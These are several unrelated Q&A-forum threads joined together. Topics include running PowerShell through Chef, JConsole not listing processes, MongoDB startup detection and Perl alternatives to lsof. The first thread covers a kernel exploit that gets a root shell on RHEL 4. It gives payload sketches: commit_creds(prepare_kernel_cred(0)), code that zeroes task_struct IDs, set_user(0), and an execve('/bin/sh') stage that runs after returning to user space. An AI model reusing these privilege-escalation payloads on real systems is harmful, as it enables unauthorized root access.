I am working on an exploit project that requires me to invoke a root shell from within the kernel. After searching through various documents and websites, I learned that the only way to do this is to elevate the current process to root privileges and then execute instructions to invoke a shell. This is because we cannot simply invoke a system call from within the kernel.
To that end, I came across the call commit_creds(prepare_kernel_cred(0));, which can be used to grant root privileges to the process. However, I am using Red Hat Enterprise Linux 4.4 Base, and it does not have the above call:
[dmazumd#bn19-62 ~]$ grep commit_cred /proc/kallsyms
[dmazumd#bn19-62 ~]$ grep _cred /proc/kallsyms
c0164655 T compute_creds
c01a7cdd t dummy_bprm_apply_creds.....
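For reference, on kernels that do export these symbols (roughly 2.6.29 and later), my understanding is that the payload would be a small kernel-mode routine along these lines (a sketch only, not applicable to my kernel):

/* Classic payload sketch for kernels that export
 * prepare_kernel_cred()/commit_creds() (roughly 2.6.29+);
 * my RHEL 4 kernel lacks these symbols. */
#include <linux/cred.h>

static void escalate_to_root(void)
{
    /* Build a fresh root credential set and install it on the current task. */
    commit_creds(prepare_kernel_cred(0));
}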
So, my question is: how do I go about this?
I understand that the need is to set the uid of the process to zero, which will give it root privileges. AFAIK, the uid now resides in struct cred rather than in struct task_struct. I am also unsure whether I can directly access these structures without using an API like the one mentioned above. Is there another call that achieves the same thing? Or is there some other approach?
PS: I am not asking for the exact answer to my question; any direction/help would be appreciated.
To clarify things: your kernel does not need 'root privileges'. It is actually above that. What you need is a process that has those privileges.
You could start by looking at what execve does to launch a process and do the same.
If you already have a shell running AND you are in kernel mode, you could simply modify the uid in the task_struct (sched.h).
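A minimal sketch of that idea, assuming a pre-cred kernel such as the 2.6.9-era RHEL 4 one, where the IDs are plain fields of task_struct (field names as in that era's sched.h):

/* Runs in kernel context; zeroes every ID of the current task so it
 * is treated as root. Pre-cred kernels only. */
#include <linux/sched.h>

static void escalate_current(void)
{
    struct task_struct *task = current;

    task->uid   = 0;
    task->euid  = 0;
    task->suid  = 0;
    task->fsuid = 0;
    task->gid   = 0;
    task->egid  = 0;
    task->sgid  = 0;
    task->fsgid = 0;
}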
Also, take a look here.
I finally achieved a root shell by first elevating the process to root status while inside the kernel. This was done using the call set_user(0), whose symbol is listed in /proc/kallsyms.
Once this is done, the process switches back to user space using iret and then spawns a shell. This shell has root privileges.
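The user-space stage is then trivial; a sketch of the logic that runs after the iret (error handling omitted):

/* Userland stage, entered after the kernel stage returns via iret.
 * The credentials were already zeroed in the kernel, so exec'ing a
 * shell is enough. */
#include <unistd.h>

int main(void)
{
    char *argv[] = { "/bin/sh", NULL };
    execve("/bin/sh", argv, NULL);  /* the shell inherits the escalated creds */
    return 1;                       /* reached only if execve fails */
}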
I have a PowerShell script on the Chef server that needs to run on a remote Windows server. How can I run this PowerShell script from the Chef server on the remote Windows server?
Chef doesn't do anything like this. First, Chef Server can never remotely access servers directly; all it does is store data. Second, Chef doesn't really do "run a thing in a place right now". We offer workstation tools like knife ssh and knife winrm as simplistic wrappers, but they aren't made for anything complex. The Chef-y way to do this would be to make a recipe and run your script using the powershell_script resource.
Does that mean Chef is also running on the Windows server?
If yes, why not use PsExec from the Windows Sysinternals PsTools?
https://learn.microsoft.com/en-us/sysinternals/downloads/psexec
Here is my understanding of what you are trying to achieve. If I'm wrong then please correct me in a comment and I will update my answer.
You have a powershell script that you need to run on a specific server or set of servers.
It would be convenient to have a central management solution for running this script instead of logging into each server and running it manually.
Ergo, you either need to run this script in many places when a condition isn't met (such as a file being missing), or you need to run this script often, or you need this script to run with a certain timing relative to other processes you have going on.
Without knowing precisely what you're trying to achieve with your script, the best solution I know of is to write a cookbook and do one of the following:
If your script is complex, place it in your cookbook/files folder (assuming the script will be identical on all computers it runs on) or in your cookbook/templates folder (if you need to inject information into it at write time). You can then write the .ps1 file to the local computer during a Chef converge with one of the following code snippets. After you write it to disk you will also have to call it with one of the commands in the next bullet.
Monomorphic file:
cookbook_file '<destination>' do
  source '<filename.ps>'
  <other options>
end
Options can be found at https://docs.chef.io/resource_cookbook_file.html
Polymorphic file:
template '<destination>' do
  source '<template.ps.erb>'
  variables(<hash of variables and values>)
  <other options>
end
Options can be found at https://docs.chef.io/resource_template.html
If your script is a simple one-liner, you can instead use powershell_script, powershell_out! or execute. powershell_out! has all the same options and features as the shell_out! command, with the added advantage that your converge will pause until it receives an exit status for the command, if that is desirable. The documentation on using it is a bit spotty, though, so spend time experimenting with it and googling.
https://docs.chef.io/resource_powershell_script.html
https://docs.chef.io/resource_execute.html
Whichever option you end up going with, you will probably want to guard your resource with conditions on when it should not run, such as when a file already exists, a registry key is set, or whatever else your script changes that you can test for. If you truly want the script to execute on every single converge then you can skip this step, but that is a code smell and I urge you to reconsider your plans.
https://docs.chef.io/resource_common.html#guards
It's important to note that this is not an exhaustive list of how to run a powershell script on your nodes, just a collection of common patterns I've seen.
Hope this helped.
I am encountering several situations where, in a Chef recipe with powershell_script, a command appears to fail, whereas if I run the same command in PowerShell outside of Chef, it works.
The two in particular are "regedit", which I am trying to use to set a key for app compatibility, and "net use z:...." to create a mapped drive. Both of these seem to work fine if I run them in PowerShell, but if I use them inside a powershell_script resource in a recipe, they don't appear to do anything.
So I'm wondering: is this because Chef runs commands inside powershell_script at some lower privilege level?
Also, if so, how do I change it so that regedit and net use work?
Thanks,
Jim
EDIT 1: This seems to work for adding the registry entry I needed:
registry_key "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags" do
values [{
:name => "{2b9034f3-b661-4d36-a5ef-60ab5a711ace}",
:type => :dword,
:data => 00000004
}]
action :create
end
That prevents the compatibility popup that I am getting when we run the SharePoint installer.
EDIT 2: I hope this is OK, but for the record, for more visibility, and in the hope that I remember this, I found the following regarding mapping drives in Windows with Chef:
Mount windows shares on a windows node with Chef
and:
https://tickets.opscode.com/browse/CHEF-1267
I haven't tried that yet, but it seems like the answer to my drive-mapping need... hopefully.
The chef client service runs as Local System (SYSTEM) by default.
In Windows, that user has full privileges on the local system, like root basically, but on the network it authenticates as the computer object.
So if you are trying to use regedit to change something in, for example, HKEY_CURRENT_USER, then you need to remember that the code will not see the same "current user" as you do when you run it interactively. Also, regedit is an .exe; you should really do what you need through the PowerShell providers or .NET objects.
With net use you are trying to map a drive. It's likely that the computer account doesn't have the rights to the share that your user has. Again, net.exe is a separate executable. net use maps a share to a drive letter (usually), and you shouldn't be doing that in a configuration script, in my opinion. You should access the UNC path directly, but either way I still think you're probably running into a permissions issue here.
You could change the credentials of the service to use a user account that has all the rights you want, but before doing something like that you should consider changing your workflow to not need that.
Does MongoDB create a file I can poll for in order to determine when prealloc is done? Right now I have a script that runs rs.init(..config..), but I need to wait to trigger it until mongod is up and running.
Since tailing the log file (tail -f | grep .. | xargs ..) is a bit of a flaky hack, I wondered whether there is any other way to determine that mongod is done with prealloc.
We have the same problem for testing replica sets with the PHP driver. Here we use the mongo shell's ReplSetTest() functionality to get around this. You can see how that works here:
https://github.com/mongodb/mongo-php-driver/blob/master/tests/utils/myconfig.js#L9
However, I am not sure how well this works for non-test environments, as the number of options you can give is rather limited (for example, you can't set a data dir properly, as things are hardcoded). All the functions and code for this are in JavaScript at https://github.com/mongodb/mongo/blob/master/src/mongo/shell/replsettest.js — this should give you an overview of how it works and allow you to rewrite it in your preferred language.
Try using inotify (I am not sure exactly); for example, if you need to determine that the file has been closed after writing:
[maverick#mutabor ~]$ pyinotify -e IN_CLOSE_WRITE /tmp/testfile
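If the pyinotify helper isn't available, the same check can be done against the raw Linux inotify API directly; a minimal C sketch, assuming the path /tmp/testfile and trimming error handling:

/* Block until /tmp/testfile is closed after being written. */
#include <stdio.h>
#include <unistd.h>
#include <sys/inotify.h>

int main(void)
{
    char buf[4096];
    int fd = inotify_init();
    if (fd < 0)
        return 1;

    /* IN_CLOSE_WRITE fires when a file opened for writing is closed. */
    if (inotify_add_watch(fd, "/tmp/testfile", IN_CLOSE_WRITE) < 0)
        return 1;

    /* read() blocks until at least one event arrives. */
    if (read(fd, buf, sizeof(buf)) > 0)
        printf("/tmp/testfile was closed after writing\n");

    close(fd);
    return 0;
}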
I tried to run JConsole to analyze the memory used by a running process, but JConsole doesn't show me any processes, even though I am absolutely sure one is running (besides, it should show JConsole itself in the process list as well, but it doesn't).
Does anyone have an idea why it doesn't show any processes?
Cheers
At a Windows prompt, run echo %TMP%; it will give you the default temp directory. Go to that directory and find the directory named hsperfdata_user, where user is your login. This is the directory that stores your process IDs: any new Java process you create will get a new file there named after its process ID, and JConsole picks up the process IDs from this directory. If you cannot create a file in this directory, you need to change its permissions to allow writing. Once you have done that, start a new Java application and check whether a new process-ID file appears in the directory. Once confirmed, start JConsole.
I have the same problem. But if I explicitly specify the PID, as in jconsole 1234, jconsole is able to analyze the process.
If you are running jconsole on Windows, simply:
Find jconsole.exe
Right click it
Select run as administrator.
In my case, removing the hsperfdata_USERNAME directory (in the %TMP% directory) and closing all the JVMs helped.
This happens when the %TMP% value is different for the monitored JVM and the monitoring tool (JConsole / JMC (Java Mission Control), maybe even VisualVM).
This may be the standard scenario with Cygwin (at least in my case: Cygwin+Babun).
The easiest solution is to set the TMP environment variable to the default value used by Windows, at least in the scope of the shell launching the JVM.
You have to start jconsole as the same user that started the process you want to analyze.
Just ran into this issue.
If you are using multiple JDKs by any chance (e.g. via SDKMAN), then make sure that jconsole is run using the same JDK as the application.
8 years later... I had the same problem. I could only see certain processes, but couldn't see or monitor any Java processes running in a Docker container on Linux.
Inspired by the Windows solution by RoyalBigMack:
Solution 1. Run the terminal as superuser (su command) and run jconsole.
Solution 2. Run solution 1 as one command: sudo jconsole.
Only the first solution worked for me, and once the jconsole UI popped up, all the hidden processes were visible.
I have a shell script that archives log files based on whether the process is running or not. If a log file is not being used by the process, I archive it. Until now I have been using lsof to find which log files are in use, but going forward I have decided to use Perl for this.
Is there a Perl module that can do what lsof does on Linux?
There is a perl module, which wraps around lsof. See Unix::Lsof.
As I see it, the big problem with not using lsof is that one would need to work in a way that is independent of the operating system. Using lsof lets the Perl programmer work with a consistent tool, allowing for operating-system independence.
Having a Perl module developer rewrite lsof would, in effect, mean writing lsof as a library and then linking that into Perl, which is much more work than just using the existing binary.
One could also use the fuser command, which shows the process IDs that have a handle on the file. There is also a module that seeks to implement the same functionality. Note from the perldoc:
The way that this works is highly unlikely to work on any other OS
other than Linux and even then it may not work on other than 2.2.*
kernels.
One might try walking /proc/*/fd and looking at the file descriptors there to see whether any point to the file in question (a sketch of this follows below). If the process ID of the running process that would have the log file open is known, it is just as easy to look at that process alone. Note that this is how the fuser module works.
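The technique is language-agnostic and easy to transliterate into Perl; a minimal C sketch, assuming Linux and permission to read other processes' fd directories:

/* Report which PIDs have the file named on the command line open,
 * by resolving every symlink under /proc/<pid>/fd. Not production
 * code: error handling is minimal. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <dirent.h>
#include <unistd.h>
#include <limits.h>

int main(int argc, char **argv)
{
    if (argc != 2) {
        fprintf(stderr, "usage: %s <file>\n", argv[0]);
        return 1;
    }

    DIR *proc = opendir("/proc");
    struct dirent *pe;
    while (proc && (pe = readdir(proc)) != NULL) {
        if (!isdigit((unsigned char)pe->d_name[0]))
            continue;                      /* only numeric PID entries */

        char fddir[PATH_MAX];
        snprintf(fddir, sizeof(fddir), "/proc/%s/fd", pe->d_name);
        DIR *fds = opendir(fddir);         /* may fail for other users' processes */
        if (!fds)
            continue;

        struct dirent *fe;
        while ((fe = readdir(fds)) != NULL) {
            char link[PATH_MAX], target[PATH_MAX];
            snprintf(link, sizeof(link), "%s/%s", fddir, fe->d_name);
            ssize_t n = readlink(link, target, sizeof(target) - 1);
            if (n < 0)
                continue;
            target[n] = '\0';
            if (strcmp(target, argv[1]) == 0)
                printf("pid %s has %s open\n", pe->d_name, argv[1]);
        }
        closedir(fds);
    }
    if (proc)
        closedir(proc);
    return 0;
}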
That said, it should be asked "why do you want to move away from lsof"?